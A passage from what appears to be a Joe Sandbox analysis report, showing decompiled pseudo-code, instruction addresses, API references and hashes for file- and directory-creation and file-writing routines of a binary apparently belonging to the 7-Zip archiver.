								 *(_t238 - 0x42) = _t185;
								 *(_t238 - 4) = 0xa;
								_t156 =  *((intOrPtr*)( *_t231 + 0x20))(_t231, 0x2c, _t238 - 0x44);
								__eflags = _t156;
								if(_t156 == 0) {
									__eflags =  *(_t238 - 0x44) - 0x15;
									if( *(_t238 - 0x44) == 0x15) {
										L28:
										_t158 = E0040C5AD(_t238 - 0x44);
										_t208 =  *((intOrPtr*)(_t238 + 0x20));
										 *_t208 = _t158;
										 *(_t208 + 4) = _t227;
									} else {
										__eflags =  *(_t238 - 0x44) - 0x13;
										if( *(_t238 - 0x44) == 0x13) {
											goto L28;
										}
									}
								}
								 *(_t238 - 4) = 3;
								E0040C20F(_t238 - 0x44);
							}
							_t236 =  *((intOrPtr*)( *((intOrPtr*)( *((intOrPtr*)(_t238 + 0x14)))) + 0x30))(_t235);
							L00407A18( *((intOrPtr*)(_t238 - 0x34)));
							 *((intOrPtr*)(_t238 - 0x6c)) = 0x47a420;
							 *(_t238 - 4) = 0xb;
						} else {
							L00407A18( *((intOrPtr*)(_t238 - 0x34)));
							 *((intOrPtr*)(_t238 - 0x6c)) = 0x47a420;
							_t236 =  *(_t238 + 0x10);
							 *(_t238 - 4) = 9;
						}
					} else {
						_t160 = E00409D7C( *((intOrPtr*)(_t238 - 0x34))); // executed
						__eflags = _t160;
						if(_t160 != 0) {
							goto L18;
						} else {
							_t236 = GetLastError();
							__eflags = _t236 - _t185;
							if(_t236 == _t185) {
								_t236 = 0x80004005;
							}
							_t162 = L00403532(_t238 - 0x28, L"Can not create output directory ");
							_push(_t238 - 0x34);
							 *(_t238 - 4) = 6;
							_t163 = L0040B0A0(_t238 - 0x40, _t162);
							 *(_t238 - 4) = 7;
							E00401E26( *((intOrPtr*)(_t238 + 0x1c)), _t163);
							L00407A18( *((intOrPtr*)(_t238 - 0x40)));
							L00407A18( *(_t238 - 0x28));
							L00407A18( *((intOrPtr*)(_t238 - 0x34)));
							 *((intOrPtr*)(_t238 - 0x6c)) = 0x47a420;
							 *(_t238 - 4) = 8;
						}
					}
					E0040862D();
					 *(_t238 - 4) = _t185;
					E00408604(_t238 - 0x6c);
					goto L33;
				} else {
					_t169 =  *((intOrPtr*)( *_t231 + 0x14))(_t231, _t238 - 0x18);
					if(_t169 == 0) {
						__eflags =  *(_t238 - 0x18);
						 *((intOrPtr*)(_t238 - 0x10)) = 0;
						if( *(_t238 - 0x18) <= 0) {
							L9:
							__eflags =  *((intOrPtr*)(_t238 - 0x50)) - _t185;
							if( *((intOrPtr*)(_t238 - 0x50)) != _t185) {
								goto L13;
							} else {
								 *((intOrPtr*)( *((intOrPtr*)( *((intOrPtr*)(_t238 + 0x14)))) + 0x2c))();
								goto L11;
							}
						} else {
							while(1) {
								 *(_t238 - 0x28) = _t185;
								 *(_t238 - 0x24) = _t185;
								 *(_t238 - 0x20) = _t185;
								E00401E9A(_t238 - 0x28, 3);
								_push(_t238 - 0x28);
								 *(_t238 - 4) = 1;
								_push( *((intOrPtr*)(_t238 - 0x10)));
								_t175 = L004179F7( *((intOrPtr*)(_t238 - 0x14)));
								__eflags = _t175 - _t185;
								if(_t175 != _t185) {
									break;
								}
								_t175 = L004179E9(_t238 + 0x13);
								__eflags = _t175 - _t185;
								if(_t175 != _t185) {
									break;
								} else {
									__eflags =  *((intOrPtr*)(_t238 + 0x13)) - _t185;
									_t180 = E00408E6D( *((intOrPtr*)(_t238 + 0x13)) - _t185, _t238 - 0x28, _t175 & 0xffffff00 |  *((intOrPtr*)(_t238 + 0x13)) == _t185);
									__eflags = _t180;
									if(_t180 != 0) {
										E00415C6D(_t238 - 0x58,  *((intOrPtr*)(_t238 - 0x10)));
									}
									 *(_t238 - 4) = _t185;
									L00407A18( *(_t238 - 0x28));
									 *((intOrPtr*)(_t238 - 0x10)) =  *((intOrPtr*)(_t238 - 0x10)) + 1;
									__eflags =  *((intOrPtr*)(_t238 - 0x10)) -  *(_t238 - 0x18);
									if( *((intOrPtr*)(_t238 - 0x10)) <  *(_t238 - 0x18)) {
										continue;
									} else {
										goto L9;
									}
								}
								goto L34;
							}
							_t236 = _t175;
							L00407A18( *(_t238 - 0x28));
							L33:
							_t117 = _t238 - 4;
							 *_t117 =  *(_t238 - 4) | 0xffffffff;
							__eflags =  *_t117;
							E00408604(_t238 - 0x58);
							_t153 = _t236;
						}
					} else {
						_t185 = _t169;
						L11:
						 *(_t238 - 4) =  *(_t238 - 4) | 0xffffffff;
						E00408604(_t238 - 0x58);
						_t153 = _t185;
					}
				}
				L34:
				 *[fs:0x0] =  *((intOrPtr*)(_t238 - 0xc));
				return _t153;
			}
























                                                                                  0x00416927
                                                                                  0x0041692f
                                                                                  0x00416933
                                                                                  0x00416936
                                                                                  0x00416939
                                                                                  0x0041693c
                                                                                  0x0041693e
                                                                                  0x00416941
                                                                                  0x00416949
                                                                                  0x0041694e
                                                                                  0x00416955
                                                                                  0x00416958
                                                                                  0x0041695d
                                                                                  0x00416a25
                                                                                  0x00416a2a
                                                                                  0x00416a2f
                                                                                  0x00416a3d
                                                                                  0x00416a41
                                                                                  0x00416a4e
                                                                                  0x00416a52
                                                                                  0x00416a5d
                                                                                  0x00416a64
                                                                                  0x00416a71
                                                                                  0x00416a75
                                                                                  0x00416a7d
                                                                                  0x00416a85
                                                                                  0x00416a89
                                                                                  0x00416a8e
                                                                                  0x00416a93
                                                                                  0x00416b09
                                                                                  0x00416b30
                                                                                  0x00416b36
                                                                                  0x00416b3b
                                                                                  0x00416b40
                                                                                  0x00416b45
                                                                                  0x00416b47
                                                                                  0x00416b4a
                                                                                  0x00416b68
                                                                                  0x00416b6b
                                                                                  0x00416b77
                                                                                  0x00416b77
                                                                                  0x00416b6d
                                                                                  0x00416b6d
                                                                                  0x00416b70
                                                                                  0x00000000
                                                                                  0x00416b72
                                                                                  0x00416b72
                                                                                  0x00416b74
                                                                                  0x00416b74
                                                                                  0x00416b70
                                                                                  0x00416b79
                                                                                  0x00416b7c
                                                                                  0x00416b7e
                                                                                  0x00416b80
                                                                                  0x00416b81
                                                                                  0x00416bde
                                                                                  0x00416b83
                                                                                  0x00416b8a
                                                                                  0x00416b8c
                                                                                  0x00416b90
                                                                                  0x00416b9d
                                                                                  0x00416ba1
                                                                                  0x00416ba4
                                                                                  0x00416ba6
                                                                                  0x00416ba8
                                                                                  0x00416bad
                                                                                  0x00416bb6
                                                                                  0x00416bb9
                                                                                  0x00416bbe
                                                                                  0x00416bc1
                                                                                  0x00416bc3
                                                                                  0x00416baf
                                                                                  0x00416baf
                                                                                  0x00416bb4
                                                                                  0x00000000
                                                                                  0x00000000
                                                                                  0x00416bb4
                                                                                  0x00416bad
                                                                                  0x00416bc9
                                                                                  0x00416bcd
                                                                                  0x00416bcd
                                                                                  0x00416be9
                                                                                  0x00416bee
                                                                                  0x00416bf4
                                                                                  0x00416bfb
                                                                                  0x00416b4c
                                                                                  0x00416b4f
                                                                                  0x00416b55
                                                                                  0x00416b5c
                                                                                  0x00416b5f
                                                                                  0x00416b5f
                                                                                  0x00416a95
                                                                                  0x00416a98
                                                                                  0x00416a9d
                                                                                  0x00416a9f
                                                                                  0x00000000
                                                                                  0x00416aa1
                                                                                  0x00416aa7
                                                                                  0x00416aa9
                                                                                  0x00416aab
                                                                                  0x00416aad
                                                                                  0x00416aad
                                                                                  0x00416aba
                                                                                  0x00416ac4
                                                                                  0x00416ac8
                                                                                  0x00416acc
                                                                                  0x00416ad5
                                                                                  0x00416ad9
                                                                                  0x00416ae1
                                                                                  0x00416ae9
                                                                                  0x00416af1
                                                                                  0x00416af9
                                                                                  0x00416b00
                                                                                  0x00416b00
                                                                                  0x00416a9f
                                                                                  0x00416c02
                                                                                  0x00416c0a
                                                                                  0x00416c0d
                                                                                  0x00000000
                                                                                  0x00416963
                                                                                  0x0041696a
                                                                                  0x0041696f
                                                                                  0x00416978
                                                                                  0x0041697b
                                                                                  0x0041697e
                                                                                  0x004169f5
                                                                                  0x004169f5
                                                                                  0x004169f8
                                                                                  0x00000000
                                                                                  0x004169fa
                                                                                  0x004169ff
                                                                                  0x00000000
                                                                                  0x004169ff
                                                                                  0x00416980
                                                                                  0x00416980
                                                                                  0x00416985
                                                                                  0x00416988
                                                                                  0x0041698b
                                                                                  0x0041698e
                                                                                  0x00416999
                                                                                  0x0041699a
                                                                                  0x0041699e
                                                                                  0x004169a1
                                                                                  0x004169a6
                                                                                  0x004169a8
                                                                                  0x00000000
                                                                                  0x00000000
                                                                                  0x004169b3
                                                                                  0x004169b8
                                                                                  0x004169ba
                                                                                  0x00000000
                                                                                  0x004169bc
                                                                                  0x004169bc
                                                                                  0x004169ca
                                                                                  0x004169cf
                                                                                  0x004169d1
                                                                                  0x004169d9
                                                                                  0x004169d9
                                                                                  0x004169e1
                                                                                  0x004169e4
                                                                                  0x004169e9
                                                                                  0x004169f0
                                                                                  0x004169f3
                                                                                  0x00000000
                                                                                  0x00000000
                                                                                  0x00000000
                                                                                  0x00000000
                                                                                  0x004169f3
                                                                                  0x00000000
                                                                                  0x004169ba
                                                                                  0x00416a18
                                                                                  0x00416a1a
                                                                                  0x00416c12
                                                                                  0x00416c12
                                                                                  0x00416c12
                                                                                  0x00416c12
                                                                                  0x00416c19
                                                                                  0x00416c1e
                                                                                  0x00416c1e
                                                                                  0x00416971
                                                                                  0x00416971
                                                                                  0x00416a02
                                                                                  0x00416a02
                                                                                  0x00416a09
                                                                                  0x00416a0e
                                                                                  0x00416a0e
                                                                                  0x0041696f
                                                                                  0x00416c20
                                                                                  0x00416c26
                                                                                  0x00416c2e

                                                                                  APIs
                                                                                  • __EH_prolog.LIBCMT ref: 00416927
                                                                                  • GetLastError.KERNEL32(?,00000000,0048BB7C,?,00000004,00000004,?,00000000,00000000), ref: 00416AA1
                                                                                  Strings
                                                                                  Memory Dump Source
                                                                                  • Source File: 0000000F.00000002.401310359.0000000000401000.00000020.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true
                                                                                  • Associated: 0000000F.00000002.401259398.0000000000400000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                  • Associated: 0000000F.00000002.401384599.000000000047A000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                  • Associated: 0000000F.00000002.401606667.000000000048A000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                                  • Associated: 0000000F.00000002.401655970.000000000048B000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                  • Associated: 0000000F.00000002.401667855.000000000048C000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                                  • Associated: 0000000F.00000002.401685351.000000000048D000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                  • Associated: 0000000F.00000002.401698545.0000000000490000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                  • Associated: 0000000F.00000002.401715453.0000000000499000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_15_2_400000_7zz.jbxd
                                                                                  Similarity
                                                                                  • API ID: ErrorH_prologLast
                                                                                  • String ID: 59@$Can not create output directory
                                                                                  • API String ID: 1057991267-3326608674
                                                                                  • Opcode ID: aa03b1b9719480a613dd0779f5744a711ba90c60dd743b3e61de5665c96953ae
                                                                                  • Instruction ID: 6de5a34db444ab3dab8a47dd72c1d742a8883a30c047269dba67d70d491f02d0
                                                                                  • Opcode Fuzzy Hash: aa03b1b9719480a613dd0779f5744a711ba90c60dd743b3e61de5665c96953ae
                                                                                  • Instruction Fuzzy Hash: E0A1C171D04249EFCF10EFA4C9419EEBBB4AF18308F14446EE455B7291DB38AE45CB69
                                                                                  Uniqueness

                                                                                  Uniqueness Score: -1.00%

                                                                                  Function 00470330 Relevance: 6.1, APIs: 4, Instructions: 135fileCOMMON
                                                                                  Download Yara Rule

                                                                                  Control-flow Graph

                                                                                  • Executed
                                                                                  • Not Executed
                                                                                  control_flow_graph 2072 470330-470347 2073 470350-470370 2072->2073 2074 470349-47034b 2072->2074 2076 470372-47037d call 4716c1 2073->2076 2077 470380-470388 2073->2077 2075 4704b6-4704ba 2074->2075 2076->2077 2079 47044f-470464 WriteFile 2077->2079 2080 47038e-47039a 2077->2080 2081 470466-47046f 2079->2081 2082 470471-47047a GetLastError 2079->2082 2084 4703a0 2080->2084 2085 47048a-470491 2080->2085 2086 470418-47041d 2081->2086 2082->2086 2089 4703a6-4703af 2084->2089 2087 470493-470499 2085->2087 2088 47049f-4704b1 call 470646 call 47064f 2085->2088 2090 4704b3 2086->2090 2091 470423-470426 2086->2091 2087->2074 2087->2088 2111 470485-470488 2088->2111 2093 4703b1-4703bc 2089->2093 2094 4703da-4703ff WriteFile 2089->2094 2090->2075 2091->2085 2099 470428-47042e 2091->2099 2095 4703c5-4703d8 2093->2095 2096 4703be-4703c4 2093->2096 2097 470444-47044d GetLastError 2094->2097 2098 470401-470409 2094->2098 2095->2089 2095->2094 2096->2095 2101 470416 2097->2101 2098->2101 2102 47040b-470414 2098->2102 2103 470430-470442 call 470646 call 47064f 2099->2103 2104 47047c-470484 call 4705d3 2099->2104 2101->2086 2102->2084 2102->2101 2103->2111 2104->2111 2111->2075
                                                                                  C-Code - Quality: 100%
                                                                                  			E00470330(long _a4, void* _a8, long _a12) {
				intOrPtr* _v8;
				long _v12;
				long _v16;
				signed int _v20;
				void _v1048;
				void** _t66;
				signed int _t67;
				intOrPtr _t69;
				signed int _t70;
				intOrPtr _t71;
				signed int _t73;
				signed int _t80;
				int _t85;
				long _t87;
				intOrPtr* _t91;
				intOrPtr _t97;
				struct _OVERLAPPED* _t101;
				long _t103;
				signed int _t105;
				struct _OVERLAPPED* _t106;

				_t101 = 0;
				_v12 = 0;
				_v20 = 0;
				if(_a12 != 0) {
					_t91 = 0x496460 + (_a4 >> 5) * 4;
					_t105 = (_a4 & 0x0000001f) + (_a4 & 0x0000001f) * 8 << 2;
					__eflags =  *( *_t91 + _t105 + 4) & 0x00000020;
					if(__eflags != 0) {
						E004716C1(__eflags, _a4, 0, 2);
					}
					_t66 =  *_t91 + _t105;
					__eflags = _t66[1] & 0x00000080;
					if((_t66[1] & 0x00000080) == 0) {
						_t67 = WriteFile( *_t66, _a8, _a12,  &_v16, _t101);
						__eflags = _t67;
						if(_t67 == 0) {
							_a4 = GetLastError();
						} else {
							_a4 = _t101;
							_v12 = _v16;
						}
						L15:
						_t69 = _v12;
						__eflags = _t69 - _t101;
						if(_t69 != _t101) {
							_t70 = _t69 - _v20;
							__eflags = _t70;
							return _t70;
						}
						__eflags = _a4 - _t101;
						if(_a4 == _t101) {
							L25:
							_t71 =  *_t91;
							__eflags =  *(_t71 + _t105 + 4) & 0x00000040;
							if(( *(_t71 + _t105 + 4) & 0x00000040) == 0) {
								L27:
								 *((intOrPtr*)(E00470646())) = 0x1c;
								_t73 = E0047064F();
								 *_t73 = _t101;
								L24:
								return _t73 | 0xffffffff;
							}
							__eflags =  *_a8 - 0x1a;
							if( *_a8 == 0x1a) {
								goto L1;
							}
							goto L27;
						}
						_t106 = 5;
						__eflags = _a4 - _t106;
						if(_a4 != _t106) {
							_t73 = E004705D3(_a4);
						} else {
							 *((intOrPtr*)(E00470646())) = 9;
							_t73 = E0047064F();
							 *_t73 = _t106;
						}
						goto L24;
					}
					__eflags = _a12 - _t101;
					_v8 = _a8;
					_a4 = _t101;
					if(_a12 <= _t101) {
						goto L25;
					} else {
						goto L6;
					}
					do {
						L6:
						_t80 =  &_v1048;
						do {
							__eflags = _v8 - _a8 - _a12;
							if(_v8 - _a8 >= _a12) {
								break;
							}
							_v8 = _v8 + 1;
							_t97 =  *_v8;
							__eflags = _t97 - 0xa;
							if(_t97 == 0xa) {
								_v20 = _v20 + 1;
								 *_t80 = 0xd;
								_t80 = _t80 + 1;
								__eflags = _t80;
							}
							 *_t80 = _t97;
							_t80 = _t80 + 1;
							__eflags = _t80 -  &_v1048 - 0x400;
						} while (_t80 -  &_v1048 < 0x400);
						_t103 = _t80 -  &_v1048;
						_t85 = WriteFile( *( *_t91 + _t105),  &_v1048, _t103,  &_v16, 0); // executed
						__eflags = _t85;
						if(_t85 == 0) {
							_a4 = GetLastError();
							break;
						}
						_t87 = _v16;
						_v12 = _v12 + _t87;
						__eflags = _t87 - _t103;
						if(_t87 < _t103) {
							break;
						}
						__eflags = _v8 - _a8 - _a12;
					} while (_v8 - _a8 < _a12);
					_t101 = 0;
					__eflags = 0;
					goto L15;
				}
				L1:
				return 0;
			}























                                                                                  0x0047033c
                                                                                  0x00470341
                                                                                  0x00470344
                                                                                  0x00470347
                                                                                  0x00470356
                                                                                  0x00470368
                                                                                  0x0047036b
                                                                                  0x00470370
                                                                                  0x00470378
                                                                                  0x0047037d
                                                                                  0x00470382
                                                                                  0x00470384
                                                                                  0x00470388
                                                                                  0x0047045c
                                                                                  0x00470462
                                                                                  0x00470464
                                                                                  0x00470477
                                                                                  0x00470466
                                                                                  0x00470469
                                                                                  0x0047046c
                                                                                  0x0047046c
                                                                                  0x00470418
                                                                                  0x00470418
                                                                                  0x0047041b
                                                                                  0x0047041d
                                                                                  0x004704b3
                                                                                  0x004704b3
                                                                                  0x00000000
                                                                                  0x004704b3
                                                                                  0x00470423
                                                                                  0x00470426
                                                                                  0x0047048a
                                                                                  0x0047048a
                                                                                  0x0047048c
                                                                                  0x00470491
                                                                                  0x0047049f
                                                                                  0x004704a4
                                                                                  0x004704aa
                                                                                  0x004704af
                                                                                  0x00470485
                                                                                  0x00000000
                                                                                  0x00470485
                                                                                  0x00470496
                                                                                  0x00470499
                                                                                  0x00000000
                                                                                  0x00000000
                                                                                  0x00000000
                                                                                  0x00470499
                                                                                  0x0047042a
                                                                                  0x0047042b
                                                                                  0x0047042e
                                                                                  0x0047047f
                                                                                  0x00470430
                                                                                  0x00470435
                                                                                  0x0047043b
                                                                                  0x00470440
                                                                                  0x00470440
                                                                                  0x00000000
                                                                                  0x0047042e
                                                                                  0x00470391
                                                                                  0x00470394
                                                                                  0x00470397
                                                                                  0x0047039a
                                                                                  0x00000000
                                                                                  0x00000000
                                                                                  0x00000000
                                                                                  0x00000000
                                                                                  0x004703a0
                                                                                  0x004703a0
                                                                                  0x004703a0
                                                                                  0x004703a6
                                                                                  0x004703ac
                                                                                  0x004703af
                                                                                  0x00000000
                                                                                  0x00000000
                                                                                  0x004703b4
                                                                                  0x004703b7
                                                                                  0x004703b9
                                                                                  0x004703bc
                                                                                  0x004703be
                                                                                  0x004703c1
                                                                                  0x004703c4
                                                                                  0x004703c4
                                                                                  0x004703c4
                                                                                  0x004703c5
                                                                                  0x004703c7
                                                                                  0x004703d2
                                                                                  0x004703d2
                                                                                  0x004703e2
                                                                                  0x004703f7
                                                                                  0x004703fd
                                                                                  0x004703ff
                                                                                  0x0047044a
                                                                                  0x00000000
                                                                                  0x0047044a
                                                                                  0x00470401
                                                                                  0x00470404
                                                                                  0x00470407
                                                                                  0x00470409
                                                                                  0x00000000
                                                                                  0x00000000
                                                                                  0x00470411
                                                                                  0x00470411
                                                                                  0x00470416
                                                                                  0x00470416
                                                                                  0x00000000
                                                                                  0x00470416
                                                                                  0x00470349
                                                                                  0x00000000

                                                                                  APIs
                                                                                  • WriteFile.KERNELBASE(?,?,?,00000000,00000000,00000001,?,?), ref: 004703F7
                                                                                  Memory Dump Source
                                                                                  • Source File: 0000000F.00000002.401310359.0000000000401000.00000020.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true
                                                                                  • Associated: 0000000F.00000002.401259398.0000000000400000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                  • Associated: 0000000F.00000002.401384599.000000000047A000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                  • Associated: 0000000F.00000002.401606667.000000000048A000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                                  • Associated: 0000000F.00000002.401655970.000000000048B000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                  • Associated: 0000000F.00000002.401667855.000000000048C000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                                  • Associated: 0000000F.00000002.401685351.000000000048D000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                  • Associated: 0000000F.00000002.401698545.0000000000490000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                  • Associated: 0000000F.00000002.401715453.0000000000499000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_15_2_400000_7zz.jbxd
                                                                                  Similarity
                                                                                  • API ID: FileWrite
                                                                                  • String ID:
                                                                                  • API String ID: 3934441357-0
                                                                                  • Opcode ID: bd8b15df62944b5eaea57f4cf8cadc52d8797af58dbada8c92088e6b14acbd15
                                                                                  • Instruction ID: f9a8e47d18844c341b85913162919efea3dfe28df8f23c4564b581e76a5f4db2
                                                                                  • Opcode Fuzzy Hash: bd8b15df62944b5eaea57f4cf8cadc52d8797af58dbada8c92088e6b14acbd15
                                                                                  • Instruction Fuzzy Hash: AE518D71901218EFCB11CF68C984ADE7BB4EF81340F10C5AAE91D9B251D738DA50CB69
                                                                                  Uniqueness

                                                                                  Uniqueness Score: -1.00%

                                                                                  Function 0040B8BF Relevance: 6.1, APIs: 4, Instructions: 91fileCOMMON
                                                                                  Download Yara Rule

                                                                                  Control-flow Graph

                                                                                  • Executed
                                                                                  • Not Executed
                                                                                  control_flow_graph 2114 40b8bf-40b8d8 __EH_prolog 2115 40b931-40b93a call 40b9c0 2114->2115 2116 40b8da-40b92f call 403532 AreFileApisANSI call 40822f call 40b882 call 407a18 * 2 2114->2116 2122 40b9b0-40b9bd 2115->2122 2123 40b93c-40b95b CreateFileW 2115->2123 2116->2122 2124 40b9a4-40b9ad 2123->2124 2125 40b95d-40b984 call 401e9a call 40b863 2123->2125 2124->2122 2135 40b986-40b999 CreateFileW 2125->2135 2136 40b99b-40b9a3 call 407a18 2125->2136 2135->2136 2136->2124
                                                                                  C-Code - Quality: 86%
                                                                                  			E0040B8BF(void** __ecx) {
				signed int _t37;
				void* _t38;
				signed int _t41;
				signed int _t45;
				intOrPtr* _t48;
				signed int _t50;
				void** _t74;
				void* _t76;
				intOrPtr _t81;

				L0046B890(0x473e14, _t76);
				_t81 =  *0x490a7c; // 0x1
				_t74 = __ecx;
				if(_t81 != 0) {
					_t37 = E0040B9C0(__ecx);
					__eflags = _t37;
					if(_t37 != 0) {
						_t38 = CreateFileW( *(_t76 + 8),  *(_t76 + 0xc),  *(_t76 + 0x10), 0,  *(_t76 + 0x14),  *(_t76 + 0x18), 0); // executed
						__eflags = _t38 - 0xffffffff;
						 *_t74 = _t38;
						if(_t38 == 0xffffffff) {
							 *(_t76 - 0x18) = 0;
							 *((intOrPtr*)(_t76 - 0x14)) = 0;
							 *((intOrPtr*)(_t76 - 0x10)) = 0;
							E00401E9A(_t76 - 0x18, 3);
							 *((intOrPtr*)(_t76 - 4)) = 2;
							_t41 = L0040B863(_t76 - 0x18);
							__eflags = _t41;
							if(_t41 != 0) {
								 *_t74 = CreateFileW( *(_t76 - 0x18),  *(_t76 + 0xc),  *(_t76 + 0x10), 0,  *(_t76 + 0x14),  *(_t76 + 0x18), 0);
							}
							L00407A18( *(_t76 - 0x18));
						}
						__eflags =  *_t74 - 0xffffffff;
						_t74[1] = 0;
						_t33 =  *_t74 != 0xffffffff;
						__eflags = _t33;
						_t37 = 0 | _t33;
					}
				} else {
					L00403532(_t76 - 0x24,  *(_t76 + 8));
					 *((intOrPtr*)(_t76 - 4)) = 0;
					_t45 = AreFileApisANSI();
					asm("sbb eax, eax");
					_push( ~_t45 + 1);
					_t48 = E0040822F(_t76 - 0x30);
					 *((char*)(_t76 - 4)) = 1;
					_t50 = L0040B882(_t74, _t81,  *_t48,  *(_t76 + 0xc),  *(_t76 + 0x10),  *(_t76 + 0x14),  *(_t76 + 0x18));
					L00407A18( *((intOrPtr*)(_t76 - 0x30)));
					L00407A18( *((intOrPtr*)(_t76 - 0x24)));
					_t37 = _t50;
				}
				 *[fs:0x0] =  *((intOrPtr*)(_t76 - 0xc));
				return _t37;
			}












                                                                                  0x0040b8c4
                                                                                  0x0040b8cf
                                                                                  0x0040b8d6
                                                                                  0x0040b8d8
                                                                                  0x0040b933
                                                                                  0x0040b938
                                                                                  0x0040b93a
                                                                                  0x0040b954
                                                                                  0x0040b956
                                                                                  0x0040b959
                                                                                  0x0040b95b
                                                                                  0x0040b962
                                                                                  0x0040b965
                                                                                  0x0040b968
                                                                                  0x0040b96b
                                                                                  0x0040b976
                                                                                  0x0040b97d
                                                                                  0x0040b982
                                                                                  0x0040b984
                                                                                  0x0040b999
                                                                                  0x0040b999
                                                                                  0x0040b99e
                                                                                  0x0040b9a3
                                                                                  0x0040b9a6
                                                                                  0x0040b9a9
                                                                                  0x0040b9ad
                                                                                  0x0040b9ad
                                                                                  0x0040b9ad
                                                                                  0x0040b9ad
                                                                                  0x0040b8da
                                                                                  0x0040b8e0
                                                                                  0x0040b8e5
                                                                                  0x0040b8e8
                                                                                  0x0040b8f0
                                                                                  0x0040b8f9
                                                                                  0x0040b8fa
                                                                                  0x0040b906
                                                                                  0x0040b914
                                                                                  0x0040b91e
                                                                                  0x0040b926
                                                                                  0x0040b92c
                                                                                  0x0040b92e
                                                                                  0x0040b9b5
                                                                                  0x0040b9bd

                                                                                  APIs
                                                                                  • __EH_prolog.LIBCMT ref: 0040B8C4
                                                                                  • AreFileApisANSI.KERNEL32(?,000000FF,00000000,00000080,0040BC55,?,00000000,0040B46E,?,59@), ref: 0040B8E8
                                                                                    • Part of subcall function 0040B882: CreateFileA.KERNEL32(?,00000000,?,00000000,?,?,00000000,?,?,0040B919,?,00000001,?,?,?,00000001), ref: 0040B8A4
                                                                                  • CreateFileW.KERNELBASE(?,?,?,00000000,0040B46E,00000000,00000000,?,000000FF,00000000,00000080,0040BC55,?,00000000,0040B46E,?), ref: 0040B954
                                                                                  • CreateFileW.KERNEL32(?,00000003,00000000,00000000,?,?,00000000,00000003), ref: 0040B997
                                                                                  Memory Dump Source
                                                                                  • Source File: 0000000F.00000002.401310359.0000000000401000.00000020.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true
                                                                                  • Associated: 0000000F.00000002.401259398.0000000000400000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                  • Associated: 0000000F.00000002.401384599.000000000047A000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                  • Associated: 0000000F.00000002.401606667.000000000048A000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                                  • Associated: 0000000F.00000002.401655970.000000000048B000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                  • Associated: 0000000F.00000002.401667855.000000000048C000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                                  • Associated: 0000000F.00000002.401685351.000000000048D000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                  • Associated: 0000000F.00000002.401698545.0000000000490000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                  • Associated: 0000000F.00000002.401715453.0000000000499000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_15_2_400000_7zz.jbxd
                                                                                  Similarity
                                                                                  • API ID: File$Create$ApisH_prolog
                                                                                  • String ID:
                                                                                  • API String ID: 1948390111-0
                                                                                  • Opcode ID: 60f2d251b11104cdcd95bf28ceed5ff14f8943fe3f031ba99dde9439acaa2137
                                                                                  • Instruction ID: 89dc2ad9e147b491d0c4ff48465b06effa766152703dd1648aaffece476b04d2
                                                                                  • Opcode Fuzzy Hash: 60f2d251b11104cdcd95bf28ceed5ff14f8943fe3f031ba99dde9439acaa2137
                                                                                  • Instruction Fuzzy Hash: 91318E72900209EFCF01AFA4DD418EEBB76EF58354F10452EF551772A1C7398A64DB98
                                                                                  Uniqueness

                                                                                  Uniqueness Score: -1.00%

                                                                                  Function 00409CCB Relevance: 6.1, APIs: 4, Instructions: 65COMMON
                                                                                  Download Yara Rule

                                                                                  Control-flow Graph

                                                                                  • Executed
                                                                                  • Not Executed
                                                                                  control_flow_graph 2141 409ccb-409ce5 __EH_prolog 2142 409d07-409d13 CreateDirectoryW 2141->2142 2143 409ce7-409d05 call 409ad5 call 409cbc call 407a18 2141->2143 2145 409d15-409d17 2142->2145 2146 409d19-409d24 GetLastError 2142->2146 2148 409d6d-409d7b 2143->2148 2145->2148 2149 409d26-409d48 call 401e9a call 40b863 2146->2149 2150 409d6b 2146->2150 2159 409d62-409d6a call 407a18 2149->2159 2160 409d4a-409d60 CreateDirectoryW call 407a18 2149->2160 2150->2148 2159->2150 2160->2148
                                                                                  C-Code - Quality: 100%
                                                                                  			E00409CCB(WCHAR* __ecx) {
				int _t17;
				signed int _t19;
				int _t23;
				signed int _t26;
				void* _t50;
				intOrPtr _t55;

				L0046B890(0x473a84, _t50);
				_t55 =  *0x490a7c; // 0x1
				if(_t55 != 0) {
					_t17 = CreateDirectoryW(__ecx, 0); // executed
					if(_t17 == 0) {
						if(GetLastError() == 0xb7) {
							L8:
							_t19 = 0;
						} else {
							 *(_t50 - 0x18) = 0;
							 *((intOrPtr*)(_t50 - 0x14)) = 0;
							 *((intOrPtr*)(_t50 - 0x10)) = 0;
							E00401E9A(_t50 - 0x18, 3);
							 *((intOrPtr*)(_t50 - 4)) = 0;
							if(L0040B863(_t50 - 0x18) == 0) {
								L00407A18( *(_t50 - 0x18));
								goto L8;
							} else {
								_t23 = CreateDirectoryW( *(_t50 - 0x18), 0);
								_t19 = L00407A18( *(_t50 - 0x18)) & 0xffffff00 | _t23 != 0x00000000;
							}
						}
					} else {
						_t19 = 1;
					}
				} else {
